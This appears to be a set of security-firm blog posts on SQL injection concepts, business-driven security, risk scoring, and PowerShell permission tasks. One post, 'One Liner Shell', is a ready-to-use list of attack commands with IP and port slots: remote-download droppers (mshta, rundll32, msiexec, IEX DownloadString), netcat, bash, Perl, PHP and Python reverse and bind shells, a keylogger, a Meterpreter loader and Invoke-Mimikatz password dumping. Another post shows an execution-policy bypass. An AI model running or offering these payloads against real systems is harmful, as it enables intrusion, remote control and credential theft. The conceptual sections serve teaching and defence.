OWASP A1-INJECTION

OWASP A1-INJECTION

SQL INJECTION

SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details.

Fig1.1: SQL injection

Type of SQL injection
 Error Based SQL injection
 Union Based SQL injection
 Blind SQL injection
 Boolean Based Blind SQLi
 Time-Based Blind SQLi

SQL Injection scenario
Imagine a big company that keeps all the records in paper form in a big room full of filing cabinets. In order to retrieve or make changes to files, someone will fill a simple fill-in-the-blanks form and then that form will be sent to a clerk who follows the instructions on the form.

For example:
Retrieve the billing records from start date _ _ _ to end date _ _ _ where the customer is _ _ _

Normally this would become something like this:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Billy Joe Bob

But in the hands of an unscrupulous person, maybe this form could be used for other purposes.
For example:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also retrieve the credit card numbers for all customers

By pretending that their name also includes other commands they can hijack the fill in the form, and if the clerk has not been trained to handle these sorts of things then maybe they will simply execute the instructions without thinking about it, and hand over all of the credit card information to a user.
Or, alternately:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also add $100,000 to Robert Mensas’ account balance
Which has similarly dangerous potential
SQL injection Architecture View

Fig1.2: SQL injection Architecture View

Impact of SQL injection
 The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
 When calculating the potential cost of an SQLI, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen.
 While this vector can be used to attack any SQL database, websites are the most frequent targets.

From Tech to Business-Driven Security

FROM TECH TO BUSINESS-DRIVEN SECURITY

INTRODUCTION:

In today’s digital world, IT security strategy must be transformed into Business-driven security strategy to prevent failure of vital digital transformation projects which will become irrelevant to the business model of an organisation.

TRANSFORMATION TO BUSINESS-DRIVEN SECURITY:

Information Security Practitioners like security analyst and consultants of an organisation should look at the information security from a business perspective to enforce proper risk management so that it will be useful to prevent the data loss or assets that are most important to the organisation during the time of a threat.

For enforcing the business-driven model of Information Security in an organisation, it is essential to understand and assess the risks for the organisation in real time and mitigating the risk by determining the incidents conclusively by a skilled incident management professional team. In short, it is critical to have a “Risk Management in an Organization” than a regular threat management team.

To create a compelling business-driven security model, a business organisation must identify all of its assets, where they are placed, which assets are more vulnerable to threats and attacks etc., which will help them to categorize their holdings for the useful incident and risk management and mitigation of threats.

WHY BUSINESS DRIVEN SECURITY MODEL : ITS IMPORTANCE :

The need for business-driven security arises, mainly due to the evolving threats from various aspects of technology which includes the latest trends like the Internet of Things (IoT), Artificial Intelligence (AI), Machine Learning etc., As these new technologies evolve, the attack vector for these technologies also evolves every day.

For example, IoT devices may have vulnerabilities in firmware level and application level, which an attacker can exploit to take over the IoT device’s control, which gradually increases the threat for the owning organisation.

Another primary reason for the business-driven security model is “The Gap of Grief”. The Gap of Grief is a concept used to refer to void in understanding of how the security vulnerabilities can cause financial and reputation loss problems in an organisation. A significant part of this problem comes with the fact that the CISOs and other information security staffs in general like Penetration testers and consultants failing to translate the challenges and risks in assessing a threat. In cyber-security terms, the problems created by not effectively being able to report security issues to the appropriate people at the right time causes the gap of grief.

Let’s consider an example scenario: The CEO tours television and radio studios in a bid to dispel negative press and to assure the public that their data is safe with the company. This often backfires when it becomes apparent that the CEO has very little knowledge of their company’s cyber-security operations, let alone how the breach occurred or how many customers were affected. This causes problems to the organisation, and the gap occurs.

ASPECTS OF BUSINESS DRIVEN MODEL:

The key element of the business-driven security model is to focus more on detection and assessing the threats then protection as it is a complicated job to carry out. Then there should be a valid defence strategy specifically for all the assets and their vulnerabilities. This defence strategy should have a definite cost to benefit values assigned.

Another aspect of the business-driven security model is, it should include the required and skilled people,  process and technology (Tools and services) for carrying out risk management process.

Organizations need to find out the security gaps between the current security level of their application and infrastructure and where they want to be for an ideal security level for effective risk management. This gap analysis process is one of the key aspects to create a business-driven security model for the organisation. This gap analysis process helps out the security staffs to work on patching the gaps and vulnerabilities effectively.

Management should come up with a proper rank level for all their assets and applications based on the key values of assets. Then it will be easy for the security people to carry out gap analysis on a regular basis based on the risk ratings of assets and applications.

CONCLUSION:

The business-driven security model is more useful for an organisation, not just regarding cost but also regarding proper assessment of threats and risk. If implemented incorrect way, it will become an essential security model to help security people mitigate the threats and security breaches.Through a business-driven approach, BriskInfosec productively orchestrates business driven security with more agile and secure way. Since it relies heavily on the risk levels for an organisation, it will help any organisation to save a lot of money and time which they were spending on the incident and threat management.

Just Talk and Hire us to create Business Driven security solutions for your orgnization

Email – contact@briskinfosec.com 

REFERENCES:

• https://www.scmagazineuk.com/bridging-the-gap-of-grief-with-business-driven-security/article/670551/
• https://www.bankinfosecurity.asia/interviews/business-driven-security-how-works-i-3688
• https://atos.net/wp-content/uploads/2017/05/atos-whitepaper-cyber-security-ready-for-anything.pdf
• https://www.scmagazineuk.com/bridging-the-gap-of-grief-with-business-driven-security/article/670551/

AUTHOR :

Dawood Ansar

Security Engineer

Briskinfosec Technology and Consulting Pvt Ltd

Find me @https://www.linkedin.com/in/dawood-ansar-29403213b/

ONE LINER SHELL

ONE LINER SHELL

One Liner Shell, Draws attention to the different types of shell and droppers which plays a most important role during penetration testing. These one-liners can be used for gaining access to the system. These scripts will be used by red teamers during their pentest.Shells are described as a small piece of code or program which is used to gain a command execution on a specific device. There are two types of shells,

1. Reverse Shell
2. Bind Shell

REVERSE SHELL

Reverse shell is a type of shell in which the victim machine connect back to the attacker machine. The attacker machine runs a listener on a specific port on which it receives the connection by performing command or code execution.

BIND SHELL

Bind shell is a type of shell in which the attacker creates a communication port or a listener on the victim machine and waits for the attacker to connect.

I was impressed by a tool, so I have decided to write this blog. Tool link: https://github.com/D4Vinci/One-Lin3r. To use these shell in your real-time scenario, you need to fill up the IP address and the port number.

We will be discussing the reverse shell and dropper for windows and Linux platforms.

1. WINDOWS PAYLOADS

   1. Microsoft's SyncAppvPublishingServer

   2. WinInstaller_dropper

   3. Win_Remote_Management

   4. Execute C# files

   5. mshta hta

   6. netcat bind shell

   7. netcat reverse shell

   8. rundll32 dropper

   9. escalate services

   10. Key logger

   11. meterpreter shell

   12. mimikatz passwds

   13. Socket reverse

2.  LINUX PAYLOADS

   1. bash reverse

   2. netcat bind

   3. piped reverse

   4. netcat reverse

   5. sockets reverse perl

   6. socket reverse php

1      WINDOWS PAYLOADS

            Here are some of following commands for shell in Windows platforms. We need to focus on the payload part and if you are willing to edit the payload, go for it.

MICROSOFT’S SYNCAPPVPUBLISHINGSERVER

The Sync-AppvPublishingServer cmdlet initiates the Microsoft Application Virtualization (App-V) publishing refresh operation in the context of the current user. The publishing refresh connects to all added servers on  the client and exposes new App-V packages and their respective extension points to the user. Using Microsoft’s SyncAppvPublishingServer to download and execute a PowerShell file.

Type = Dropper
Payload = SyncAppvPublishingServer.exe "n;((New-ObjectNet.WebClient).DownloadString('{mention the url of the payload}') | IEX

WININSTALLER_DROPPER

Windows Installer is a software component and application programming interface (API) of Microsoft Windows used for the installation, maintenance, and removal of software. Passing msi file URL to the Windows installer will download and execute the payload.

type = Dropper
Payload = msiexec /i {mention the msi file URL here}

WIN_REMOTE_MANAGEMENT

Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. Windows Remote Management provides the ability to remotely execute wmi commands

type = execute
Payload = winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}
Execute C# files

Using the .NET compiler to compile a c# payload locally that can then be executed.

Type = Execute

Payload = C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}

MSHTA HTA

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). Uses mshta command to download and execute your hta file.

Type = Dropper

Payload = mshta {your hta file url}

NETCAT BIND SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell

Type = bind shell

Payload = nc -nv 4444 -e cmd.exe

NETCAT REVERSE SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to establish a reverse shell

Type = reverse 
Payload = nc -nv {ip} {port} -e cmd.exe
rundll32 dropper

The rundll32.exe process is responsible for running DLLs and placing its libraries in the memory. Using rundll32.exe to download and execute a PowerShell file.

Type = Dropper
Payload = rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{your}');"

Escalate services

This is a power shell script which is used from power tools which are written by power Shell Empire. This script is used for escalation processes, so this script will search for vulnerable service privilege opportunities using the script from Power Tools

Type = escalation
Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

KEY LOGGER

Here a power shell script is been used to retrieve keystrokes. Using a script from powersploit to log keyboard strokes to C:\Users\Public\key.log

Type = Local
 Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log

METERPRETER SHELL

Metasploit meterpreter reverse HTTPS shell using a PowerShell script from powersploit

Type = Reverse
Payload = Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost {ip} -Lport {port} -Force

MIMIKATZ PASSWORDS

Grabbing passwords from memory using Invoke-mimikatz script from PowerSploit

Payload = Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

SOCKET REVERSE

Python socket to connect back & execute data with sub process.

Type = reverse

Payload = python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("cmd");'

LINUX PAYLOADS

Bash reverse

Interactive shell via bash’s builtin /dev/TCP.

Type = Reverse
Payload = bash -i >& /dev/tcp/{ip}/{port} 0>&1

NETCAT BIND

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell

Type = bind
Payload = nc -lvp 4444 -e /bin/sh

NETCAT REVERSE

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Establish a reverse connection with netcat.

Type = Reverse
Payload = nc -e /bin/sh {ip} {port}

PIPED REVERSE

Uses a tool exists on most of the systems and the output of the commands will be piped back.

Type = Reverse
Payload = exec 5<>/dev/tcp/{ip}/{port} && cat <&5 | while read line; do $line 2>&5 >&5; done

SOCKETS REVERSE PERL

Uses Perl sockets & the output of your commands will be piped back.

Type = reverse

Payload = perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

SOCKET REVERSE PHP

Uses PHP sockets & exec to create a reverse shell.

Type = reverse
Payload = php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");'

CONCLUSION

In today’s world, the shell is becoming very famous, interesting and  increasing in numbers. Mostly attackers preferred to hack or compromise a system using shell only because they are very flexible regarding modifying the code. Major Cyber-attacks are performed using the reverse shell. So users need to be very careful while handling any tools or files. Before executing a tool or a file try to scan the file for any malware detection (you can use some online scanners such as https://www.virustotal.com/#/home/upload or https://nodistribute.com/ ).

Be prepared and be safe

AUTHOR

Venkatesh C.S

Security Engineer

Briskinfosec Technology and Consulting PVT LTD

Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

SECURITY TASKS USING POWERSHELL

SECURITY TASKS USING POWERSHELL

PowerShell is a  advanced admin tool for Windows operating system. End users with advanced knowledge or those who have worked with an older version of windows may be much familiar with the command prompt via which you can run commands and scripts. PowerShell is similar but a lot more advanced regarding functionality.

This blog gives you some advanced functions for configuring management and automated tasks. Powershell includes both scripting language and command line shell. It is built on.Net Framework. Its also offers you Integrated Scripting Environment (ISE), which gives you a GUI where you can naturally do all your scripting.

we will see how effectively we can use PowerShell on security-related tasks,

CONTENTS

1. Understanding Execution Policy

2. Overriding Execution Policy

3. Listing NTFS Permissions

4. Clone NTFS Permissions

5. Adding Permissions

6. Removing Permissions

7. Checking Administrator Privileges

UNDERSTANDING EXECUTION POLICY

 Execution policy enables a user to determine which PowerShell scripts will be allowed to run on your computer. There are four different execution policies are available in the PowerShell.

They are

• Restricted – no scripts can run. Interactive mode only can be used.
• AllSigned – the scripts which are signed by the trusted publisher can be able to run
• RemoteSigned –   scripts which are downloaded must be approved by a trusted publisher before they run.
• Unrestricted – there will be no restriction on running any PowerShell scripts.

This command will show you current execution policy.

 PS C:\Users\proxy_000> Get-ExecutionPolicy
Restricted

End users should use the RemoteSigned. It will allow the user to run local scripts, but it won’t enable scripts from outside the network or downloaded scripts from the internet.

Professional scripters can use “Bypass” which allow you to run any script regardless of location.

Here is a command to change execution policy for your user account.

PS C:\Users\proxy_000> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

PS C:\Users\proxy_000> Get-ExecutionPolicy

Bypass

PS C:\Users\proxy_000>

OVERRIDING EXECUTION POLICY

 Execution policy is not a security boundary to protect you from attackers. It just acts as a seat belt to protect you. There are many other ways to override the execution policy and execute the scripts or commands.

PS C:\Users\proxy_000> Get-Content ‘c:\evilscript.ps1’ -Raw | powershell.exe -nonprofile - 

LISTING NTFS PERMISSIONS

 To view  NTFS permission for folders and files use Get-Act. At first, It won’t show you the actual permission. But we can make visible using this :

PS C:\Users\proxy_000> Get-Acl -path $env:windir | Select-Object -ExpandProperty Access

CLONE NTFS PERMISSIONS

  NTFS access permission is complicated and tricky. To quickly assign NTFS permission to a new folder, you can merely clone permission from another folder that you know has the correct permission applied.

$OriginalPath = “$env:temp\sample”
New-Item -Path $OriginalPath -ItemType Directory

 to assign correct permission to folder “proxy” manually

Explorer.exe “/Select,$OriginalPath.”

 Right-click the proxy folder and choose properties and then click the security tab. Now add security permission you need to apply

When your prototype folder is correctly configured. Use this code to read information about security

$sddl = (Get-Acl $OriginalPath).Sddl

 From this point, you don’t need your prototype folder anymore. It was required to create SDDL definition string.

$newpath = “$env:temp\NewFolder”
md $newpath
$sd = Get-Acl -Path $newpath
$sd.SetSecurityDescriptorSddlForm($sddl)
Set-Acl -Path $newpath -Aclobject $sd

ADDING PERMISSIONS

Adding new permission to an existing security descriptor, first, create an appropriate AccessRule object and configure it.

This script adds a new FileSystemAccessRule to the security descriptor of a file, granting read and write access to proxydomain\proxyaccount.

Make sure you adjust both user account and filename before you test the code:

$colRights = [System.Security.AccessControl.FileSystemRights]’Read, Write’
$InheritanceFlag = [System.Security.AccessControl.InheritanceFlags]::None
$PropagationFlag = [System.Security.AccessControl.PropagationFlags]::None
$objType =[System.Security.AccessControl.AccessControlType]::Allow
$objUser = New-Object System.Security.Principal.NTAccount(‘proxydomain\proxyaccount.’)
$objACE = New-Object System.Security.AccessControl.FileSystemAccessRule `
($objUser, $colRights, $InheritanceFlag, $PropagationFlag, $objType)
# get original SD

$catACL = Get-Acl ‘C:\proxy\pr0xy.txt’
 # add permission
$catACL.AddAccessRule($objACE)
 # write back the appended SD
Set-Acl ‘C:\proxy\pr0xy.txt’ $catACL

REMOVING PERMISSIONS

 To remove a permission from a security descriptor, get access to the Acl entries, and pick the ones to delete and write back the changed security descriptor.

 $catACL = Get-Acl c:\proxy\pr0xy.txt
$unwanted = $catACL.Access |
Where-Object { $_.IdentityReference.Value -eq ‘proxydomain\proxyaccount’ }
$unwanted | ForEach-Object { $null = $catACL.RemoveAccessRule($_) }
Set-Acl -Path c:\proxy\pr0xy.txt -AclObject $catACL

CHECKING ADMINISTRATOR PRIVILEGES

There are many ways to find out if a script runs been elevated. Here’s a straightforward approach that uses whoami.exe (works withWin7/Server 200 R2 or better):

 (whoami.exe /all | Select-String S-1-16-12288) -ne $null

If you do not have whoami.exe, or if you are looking for a more integrated way, you can use a line that is a little longer but identifies Admin status directly, without calling an external program:

(New-Object System.Security.Principal.WindowsPrincipal([System.Security.
Principal.WindowsIdentity]::GetCurrent())).IsInRole([System.Security.Principal.
WindowsBuiltInRole]::Administrator)

CONCLUSION :

 As we discussed in this blog, PowerShell is an advanced admin tool which is capable of performing above mentioned task. By executing these tasks, the admin could save much time. This allows  to avoid attackers to get into our system .

Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization, our constructive and customized solution will help organization from serious threats against system hardening.

AUTHOR

Venkatesh C.S

Security Engineer

Briskinfosec Technology and Consulting PVT LTD

Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Related Blogs :

1.   Two Phases of Powershell- Offensive and Defensive
2.  How to use Powershell as Handy like Shell Script?

RISK MANAGEMENT: HOW TO CALCULATE RISK?

RISK MANAGEMENT: HOW TO CALCULATE RISK?

INTRODUCTION :

Risk Assessment and Risk Management is done with the calculation of severity and likelihood. Severity is considered based on the level of the disaster which will impact in the future of the organisation. Likelihood is deemed to be found on the way risk which will probably change the organisation. The Risk calculation by analysing how the impact occurred and how it can be mitigated based on the calculation.

It is also a meaningful way to protect organization business, at the same time acquiesce with the law and procedure. It helps to focus on the risks that matters in the organization. In many scenarios, direct measures can be summed up to control risks, which means smooth, cheap and effective measures to ensure your most valuable asset.

In Risk assessment and risk management process, we are going to discuss about the how process is done. Here are the below contents.

1. Identify the hazards

2. How the risk has happened

3. Evaluate the risks

4. Scale for the Likelihood

5. Scale for the Consequence

6. Treating the risk occurred

7. Review Assessment

8. Conclusion

STEP 1 – IDENTIFY THE HAZARDS:

The risk is vital to understand the context in which it exists. It needs to define the relationship between organization and environment that functions in, so that outline of the organization facing risk is evident.

• Look at location, exposure to data;
• Interrogation with the contiguous people;
• To check any recent incidents.

STEP 2 – HOW THE RISK HAS HAPPENED:

This step denotes that to identify the likelihood and consequence of it are occurring. The risk can be of any type such as physical, ethical, financial.

The physical risks are those involving the damage to the organizational assets such the infrastructure equipment, injuries for the employees and also if the condition of the weather is terrible which affects routine services.

The Ethical risks involve potential harm to the reputation and services of the organization. The trust of the organization gets degraded when the data breach or leakage has occurred.

The Financial risks which involve the loss of organizational assets. Any theft of financial breach occurred on the internet.

 STEP 3 – EVALUATE THE RISKS:

Risk evaluation denotes the analysing the likelihood and consequences of the threat which is pointed and making the decision of risk factors were potentially have an effect and needed to be made a priority. The level of the risk is considered based on the likelihood and consequence of the impact.

The Evaluation is done by comparing the impact of the risk found during the analysis process with risk criteria previously impacted by the organization.

The criteria for evaluating the risks

SCALE FOR THE LIKELIHOOD:

Severity	Description
5	Certain: It will probably occur or often impact several times per year
4	Likely: Likely to arise once per year
3	Possible: It will occur five years once the period
2	Unlikely: Disaster occurred once in 10+ years
1	Rare: Barley occurs

SCALE FOR THE CONSEQUENCE:

Severity	Description
5	Catastrophic
4	Major
3	Moderate
2	Minor
1	Negligible

Calculation of Risk priority

Risk=Likelihood * Impact

	IMPACT
LIKELIHOOD		1	2	3	4	5
	1	Very Low	Very Low	Low	Low	Medium
	2	Very Low	Low	Medium	Medium	High
	3	Low	Medium	Medium	High	High
	4	Medium	Medium	High	High	Very High
	5	High	High	Very High	Very High	Very High

STEP 4 – TREATING THE RISK OCCURRED:

Risk Treatment identifies the range of options for treating the risk, preparing the risk treatment plans and applying those plans. Options for treatment need to be proportion to the significance of the risk.

According to the standard, there are various options existed:

• Accepting the risk
• Avoiding the risk
• Reducing the risk
• Transferring the risk
• Retaining the risk
• Financing the risk

STEP 5 – REVIEW ASSESSMENT

Reviewing is an ongoing part of risk management which is the integral step of the process. It is also an essential part of all business functions which need to monitor and treated. Monitoring and reviewing the risk is to make sure that the information which generated by the risk management process is logged, used and maintained.

CONCLUSION :

The Risk Assessment and Mangement procedure above should be implemented by organisations to secure the work activities. However, some other methods contain activities, where the work procedure covers employees undertaking work experience within the organisation. The risk management process which need be implemented in the operations and governance of every organization. However, no ‘one size fits all’ way of embedding the risk management. Preferably the process must be enhanced to fit the size, complexity, industry competition and environmental uncertainty faced by the organization.

Briskinfosec offers a comprehensive approach to manage the risk and compliance in the organization more effectively. Our customized solution meets the policies, procedure, technologies and competencies in several stream of work across the risk management categories of governance, process and technology.

AUTHOR :

Dharmesh B

Security Engineer

Briskinfosec Technology and Consulting Pvt Ltd.,

https://www.linkedin.com/in/dharmeshbaskaran/